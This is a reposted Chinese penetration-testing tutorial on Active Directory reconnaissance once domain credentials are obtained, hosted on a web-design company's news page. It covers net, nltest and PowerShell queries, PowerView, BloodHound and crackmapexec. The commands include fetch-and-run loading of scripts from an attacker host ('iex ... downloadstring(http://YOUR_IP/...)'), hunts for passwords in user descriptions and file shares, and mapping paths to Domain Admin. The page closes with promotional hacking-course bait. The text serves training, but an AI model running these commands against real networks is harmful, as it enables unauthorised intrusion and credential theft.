恒美微站 Logo 恒美微站
  • 首页
  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心
  • 联系我们

域渗透入门:拿到域账号后,如何快速摸清家底?

  • 首页
  • 资讯中心
  • /
  • 域渗透入门:拿到域账号后,如何快速摸清家底?

相关资讯

Sol Engine首日加速MiniMax H3:从模型部署到高效推理的工程实践 2026/8/14 22:51:14
安哥拉开店频繁断网,还能正常收银开单吗?本地部署 + 云端协同收银怎么选? 2026/8/14 22:46:14
如何轻松通过性能测试面试之第三篇:列举出5种以上服务器资源监控的命令或工具(完整实战排查指南) 2026/8/14 22:46:14

最新资讯

微信小程序基础开发:从零到一快速上手
张掖正规智能锁公司
VS Code 1.131能看见子代理在做什么了:多Agent开发先解决失控问题
7字重免费商用:思源宋体CN开源字体完整配置终极指南
办理出生公证认证:证天下几步搞定,无需单独对接(附问题解答)
汉中大河坎口碑较好的装饰公司推荐及选择要点

今日推荐

青岛煜鹏网站建设公司如何帮助传统企业实现数字化转型破局与增长路径
内蒙古生产建设兵团四师三十四团知青网站:承载岁月记忆与青春荣耀的精神家园
梅州市住房与城乡建设局官网:获取权威建筑信息、政策解读与民生服务的最佳平台入口

本周热门

5分钟告别提取码焦虑:baidupankey如何智能破解百度网盘资源锁
如何快速生成中国车牌图片:Python开源工具完整指南
当 LLM 遇见大文档:主流开源项目如何处理上下文超限

本月精选

如何用DamaiHelper实现演唱会门票的智能自动化抢购:完整技术解决方案指南
第4篇:59 倍性能差距的索引瓶颈定位——一次教科书级的全表扫描调优
终极歌词批量下载神器:5分钟解决离线音乐库歌词同步难题

域渗透入门:拿到域账号后,如何快速摸清家底?

发布时间:2026/8/14 22:51:15
域渗透入门:拿到域账号后,如何快速摸清家底? 域渗透入门拿到域账号后如何快速摸清家底收藏版本文介绍了在域渗透中拿到域用户凭证后的首要任务——信息收集。通过使用Windows原生命令、PowerShell远程加载脚本以及PowerView、BloodHound等工具详细阐述了如何快速摸清域环境中的用户、计算机、服务等信息。文章强调了信息收集的重要性并提供了实用的命令和查询帮助初学者更好地理解和应用域渗透技术。域渗透基础二拿到域账号后第一件事——摸清家底上一篇文章我们讲了域的基本概念域像一个小区的门禁系统域控制器DC是发门禁卡的保安室。现在假设你通过某种方式拿到了一个域用户的账号密码——可能是钓鱼邮件、WebShell 拿到了某台机器的权限、或者对方不小心把密码贴在了屏幕上。你有了一个普通住户的门禁卡接下来怎么办别急着跑 exploit先摸清这个小区长什么样。域渗透有一条铁律信息收集的深度决定你能走多远。 你不了解域里有什么用户、什么机器、什么服务就找不到攻击的方向。盲目跑 exploit 就像蒙着眼睛闯迷宫——大概率撞墙。本文的目标拿到一个域用户凭据后用现有工具最快摸清域环境。一、在原生命令中开始侦察如果你是 Windows 用户在域环境中即使被限制了 exe 和 PowerShell 运行策略net命令永远是能用的。它是操作系统的原生组件杀软不会拦它、组策略不会禁它。以下命令是你能用到的最稳定的侦察手段# 我是谁——看当前用户信息 whoami # 当前用户在哪些组里 whoami /groups # 域名叫什么 echo %USERDOMAIN% # 域控在哪儿 nltest /dclist:DOMAIN_NAME # 列出 Domain Admins 组成员 net group Domain Admins /domain # 查看域控列表更快、更准 nltest /dclist:CONTOSO # 查看域信任关系如果有跨域 nltest /domain_trusts这几个命令能告诉你什么你的账号在什么组里——如果你在#ote Desktop Users组可以直接 RDP 到服务器在Server Operators则可以管理域控上的服务域控的 IP——后续所有攻击的目标谁是域管理员——你的终极目标是否存在跨域信任大网还有更大的网一条很实用的数据清理小技巧 有些管理员会在用户的 Description 字段里写密码。上一篇文章已经提过再次强调——不要忘记检查# 查看当前用户信息包括描述字段 net user %USERNAME% /domain二、PowerShell 远程加载——不落地的信息收集如果你的目标机允许 PowerShell 运行大多数情况允许PowerShell 远程加载脚本是域渗透中最实用的侦察手段。核心思路不从宿主机磁盘写文件直接从你的 Kali HTTP 服务加载脚本到内存。2.1 用原生 PowerShell 命令枚举# 获取域信息 Get-ADDomain # 列出所有域用户 Get-ADUser -Filter * -Properties * | ft Name,SamAccountName,Description,Enabled # 列出所有加入域的计算机 Get-ADComputer -Filter * -Properties * | ft Name,OperatingSystem,Enabled # 查找 Domain Admins 组成员 Get-ADGroupMember -Identity Domain Admins # 查看所有域组 Get-ADGroup -Filter * | ft Name,GroupCategory,GroupScope # 查找所有 SPN 注册用户为后文 Kerberoasting 做准备 Get-ADUser -Filter {ServicePrincipalName -ne $null} -Properties ServicePrincipalName为什么Get-ADUser和Get-ADComputer好用 它们直接调用 AD 的 LDAP 接口查询域控返回的数据比net命令更全——比如可以筛选启用的用户、看用户最后登录时间、看描述字段。2.2 ADSI 适配器——没 RSAT 工具时的替代方案如果目标机没有安装 Active Directory 模块Windows 默认没有需要安装 RSAT可以用 ADSI 适配器# 创建一个 DirectorySearcher 对象 $searcher [ADSISearcher](objectClassuser) $searcher.PageSize 1000 $searcher.FindAll() | ForEach-Object { $_.Properties } # 列出所有域计算机 $searcher [ADSISearcher](objectClasscomputer) $searcher.PageSize 1000 $searcher.FindAll() | ForEach-Object { $_.Properties.dnshostname }这段代码不需要额外安装任何东西是所有 Windows 域成员机器上都能跑的原生方法。三、PowerView——域枚举的瑞士军刀PowerView 是 PowerSploit 框架中最常用的 AD 枚举脚本。它的厉害之处在于已经把最常查的那些东西做成了简短的函数。你的操作流程Kali 上起一个 HTTP 服务靶机上用内存加载。在 Kali 上# 准备 PowerView 脚本 wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 # 如果你在内网无法出网事先准备好脚本文件 python3 -m http.server 80在目标机Windows上# 内存加载 PowerView iex (new-object net.webclient).downloadstring(http://YOUR_IP/PowerView.ps1) # 拿到基础域信息 Get-NetDomain Get-NetDomainController # 枚举所有域用户选出最有价值的属性 Get-NetUser | select samaccountname, description, lastlogontimestamp, serviceprincipalname # 枚举所有域计算机 Get-NetComputer | select dnshostname, operatingsystem, ipaddress # 枚举所有域组 Get-NetGroup | select name # 查看指定组的成员 Get-NetGroupMember Domain Admins # 查找有 SPN 的用户为 Kerberoasting 提前准备 Get-NetUser -SPN | select samaccountname, serviceprincipalname # 搜管理员在用户描述里写的密码 Get-NetUser -LDAPFilter (description*pass*) | select samaccountname, description Get-NetUser -LDAPFilter (description*pwd*) | select samaccountname, descriptionPowerView 的最大价值 把几十行 ADSI 代码封装成一个函数。你不需要记住 LDAP 查询语法只需要记住 Get-NetUser、Get-NetComputer、Get-NetGroup 这几个核心函数就够了。PowerView 的几个救急用法# 找哪些用户是本地管理员需要先拿到目标机的管理员权限 Get-NetLocalGroup -ComputerName TARGET # 找哪些用户可以通过 RDP 登录 Get-NetLocalGroup -ComputerName TARGET |? {$_.AccountName -like *#ote Desktop*} # 查找文件服务器上的敏感文件 Get-ChildItem -Path //FILE_SERVER/Share -Recurse -Include *pass*.*, *cred*.*, *config*.*四、BloodHound——一张图看清所有路径PowerView 给出的数据是文本列表——你看到 500 个用户、50 台机器、20 个组但不知道它们之间是怎么关联的。BloodHound 解决的就是可视化攻击路径的问题。工作流程第一步Kali 上启动 neo4j 数据库 BloodHound GUIsudo neo4j start # 默认用户名密码 neo4j / neo4j # 浏览器访问 http://localhost:7474 改密码 bloodhound --no-sandbox第二步在靶机上收集数据# 用 SharpHound.exe需要上传到靶机 SharpHound.exe -c All # 或者用 PowerShell 版本不落盘 iex (new-object net.webclient).downloadstring(http://YOUR_IP/SharpHound.ps1) Invoke-BloodHound -CollectionMethod AllSharpHound 会将收集到的数据打包成日期_BloodHound.zip。第三步把 zip 文件传到 Kali拖进 BloodHound GUI# 把 zip 拖进 BloodHound 窗口即可自动导入 # 然后使用预置查询或自定义查询必用的四个预置查询1. Find all Domain Admins —— 谁是域管理员。就这几个人他们是你的最终目标2. Shortest Paths to Domain Admins from Owned Principals —— 我当前用户到域管理员的最短路径。这是你最先要看的内容。如果数据库里已经有 50 个用户但你和域管之间差了 8 条 ACL这条路径值得先走3. Find Computers where Domain Users are Local Admin —— 域用户在哪台机器上是本地管理员。这是最常用的横向移动跳板查询4. Find all users with SPN —— 所有注册了 SPN 的用户。这就是 Kerberoasting 的攻击目标BloodHound 自定义查询预置查询不够用的时候可以写自定义 Cypher 查询BloodHound 的查询语言// 查找所有可以 RDP 到域控的用户 MATCH p(u:User)-[:CanRDP]-(c:Computer {name:DC.CONTOSO.LOCAL}) RETURN p // 查找 Domain Admins 组成员但在非域控上有会话的用户 // 这意味着这些域管账号的凭据可能缓存到其他机器上 MATCH p(u:User)-[:MemberOf]-(g:Group {name:DOMAIN ADMINSCONTOSO.LOCAL}) MATCH (c:Computer)-[:HasSession]-(u) WHERE NOT c.name CONTAINS DC RETURN c.name, u.nameBloodHound 的三个核心概念节点Node用户、计算机、组、域边Edge关系MemberOf、AdminTo、HasSession、CanRDP 等路径Path从一个节点到另一个节点的关系链条你不需要一下子搞懂所有边类型。先会用前四个预置查询在每次测试中慢慢熟悉其他边。五、从 Kali 端直接用工具枚举如果目标网络允许从 Kali 直接访问域内机器OSCP 考试就是这样你甚至不需要上传脚本到靶机。# 用 LDAP 查询所有域用户 ldapsearch -H ldap://DC_IP:389 -x / -D DOMAIN/USER -w PASSWORD / -b DCDOMAIN,DCLOCAL / -s sub (objectClassuser) sAMAccountName userPrincipalName description # 用 CME 快速查看域信息 crackmapexec smb DC_IP -u USER -p PASSWORD -d DOMAIN # 用 CME 枚举域用户 crackmapexec smb DC_IP -u USER -p PASSWORD -d DOMAIN --users # 用 CME 枚举 SMB 共享看看域控上有没有暴露的共享文件夹 crackmapexec smb DC_IP -u USER -p PASSWORD -d DOMAIN --shares # 用 enum4linux-ng 枚举比 CME 更细粒度的 SMB 枚举 enum4linux-ng -u USER -p PASSWORD -d DOMAIN DC_IPCME 和 enum4linux-ng 的对比CME更快输出简洁适合批量扫描。--users、--groups、--shares、--pass-pol四个参数基本覆盖了枚举需求enum4linux-ng输出更详细包含用户 SID、组描述、密码策略的解析。适合在一台机器上做深入侦察六、典型枚举流程总结Step 1确认凭据有效 → crackmapexec smb DC_IP -u USER -p PASS -d DOMAIN → 看输出是否为 [] 绿色 Step 2获取域基本信息 → CME --users 看所有用户 → CME --groups 看所有组 → CME --shares 看可读共享 Step 3排查高价值信息 → Description 字段查密码 → SPN 注册用户为下一阶段准备 → 哪些用户是 Domain Admins Step 4安装 BloodHound如果方向不明确 → 看 Shortest Paths to Domain Admins → 找 Domain Users 是本地管理员的机器 Step 5整理结果 → 梳理哪些用户可能是弱密码用户名像密码的、名字缩写加年份的 → 标记所有 SPN 用户 → 确认下一阶段使用的攻击技术这个流程走完你对域的家底应该已经有了清晰的认识。下一篇文章会用这些信息开始发力的地方——凭据攻击。工具总结表阶段工具命令推荐场景快速确认凭据CrackMapExeccme smb DC -u USER -p PASS最优先先确认账号有效域用户枚举CMEcme smb DC --users快速获取用户列表域用户枚举详细ldapsearchldapsearch -H ldap://DC ...需要更多用户属性时域组枚举CMEcme smb DC --groups快速看所有组SMB 共享枚举CMEcme smb DC --shares看域控暴露的文件夹密码策略查询CMEcme smb DC --pass-pol判断能否做密码喷洒深度 SMB 枚举enum4linux-ngenum4linux-ng -u USER ...需要用户 SID 等细节AD 枚举脚本PowerViewGet-NetUserGet-NetComputer靶机上交互式侦察攻击路径可视化BloodHoundSharpHound 抓数据 → GUI 分析方向不明时找最短路径往期推荐渗透测试技巧十七| SSRF攻击全攻略上原理、利用与绕过渗透测试技巧十八| SSRF攻击全攻略下深入利用与实战渗透测试技巧十九|文件上传绕过全手法上渗透测试技巧二十|文件上传绕过全手法下渗透测试技巧二十一Hash密码获取与破解上渗透测试技巧二十二| Hash密码获取与破解下[渗透测试技巧二十三| MSSQL 数据库渗透测试](https://mp.weixin.qq.com/s?__bizMzY4NzI2NTczOQmid224文章来自网上侵权请联系博主互动话题如果你对网络攻防技术感兴趣想学习更多网安方面的知识和工具可以看看以下题外话题外话黑客/网络安全学习路线今天只要你给我的文章点赞我私藏的网安学习资料一样免费共享给你们来看看有哪些东西。网络安全学习资源分享:下面给大家分享一份2026最新版的网络安全学习路线资料帮助新人小白更系统、更快速的学习黑客技术一、2026最新网络安全学习路线一个明确的学习路线可以帮助新人了解从哪里开始按照什么顺序学习以及需要掌握哪些知识点。对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图学习规划。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 *安全链接放心点击我们把学习路线分成L1到L4四个阶段一步步带你从入门到进阶从理论到实战。L1级别:网络安全的基础入门L1阶段我们会去了解计算机网络的基础知识以及网络安全在行业的应用和分析学习理解安全基础的核心原理关键技术以及PHP编程基础通过证书考试可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。L2级别网络安全的技术进阶L2阶段我们会去学习渗透测试包括情报收集、弱口令与口令爆破以及各大类型漏洞还有漏洞挖掘和安全检查项目可参加CISP-PTE证书考试。L3级别网络安全的高阶提升L3阶段我们会去学习反序列漏洞、RCE漏洞也会学习到内网渗透实战、靶场实战和技术提取技术系统学习Python编程和实战。参加CISP-PTE考试。L4级别网络安全的项目实战L4阶段我们会更加深入进行实战训练包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握而L3 L4更多的是通过项目实战来掌握核心技术针对以上网安的学习路线我们也整理了对应的学习视频教程和配套的学习资料。二、技术文档和经典PDF书籍书籍和学习文档资料是学习网络安全过程中必不可少的我自己整理技术文档包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点电子书也有200多本书籍含电子版PDF三、网络安全视频教程对于很多自学或者没有基础的同学来说书籍这些纯文字类的学习教材会觉得比较晦涩难以理解因此我们提供了丰富的网安视频教程以动态、形象的方式展示技术概念帮助你更快、更轻松地掌握核心知识。网上虽然也有很多的学习资源但基本上都残缺不全的这是我自己录的网安视频教程上面路线图的每一个知识点我都有配套的视频讲解。四、网络安全护网行动/CTF比赛学以致用当你的理论知识积累到一定程度就需要通过项目实战在实际操作中检验和巩固你所学到的知识同时为你找工作和职业发展打下坚实的基础。五、网络安全工具包、面试题和源码“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等感兴趣的同学不容错过。面试不仅是技术的较量更需要充分的准备。在你已经掌握了技术之后就需要开始准备面试我们将提供精心整理的网安面试题库涵盖当前面试中可能遇到的各种技术问题让你在面试中游刃有余。如果你是要找网安方面的工作它们绝对能帮你大忙。这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的如果大家有好的题目或者好的见解欢迎分享。参考解析深信服官网、奇安信官网、Freebuf、csdn等内容特点条理清晰含图像化表示更加易懂。内容概要包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…**读者福利 |***CSDN大礼包《网络安全入门进阶学习资源包》免费分享 *安全链接放心点击

关于恒美微站

恒美微站专注于为个体商户、工作室提供极简自助建站服务,让每个人都能轻松拥有专业网站。

快速链接

  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心

服务项目

  • 可视化建站
  • 拖拽编辑
  • 主题定制
  • SEO 优化
  • 网站托管

联系方式

  • 📍 地址:北京市朝阳区建国路 88 号
  • 📞 电话:400-888-8888
  • ✉️ 邮箱:info@hmyw.cn
  • 🕐 时间:周一至周日 9:00-18:00

© 2024 恒美微站 hmyw.cn 版权所有 | 京 ICP 备 12345678 号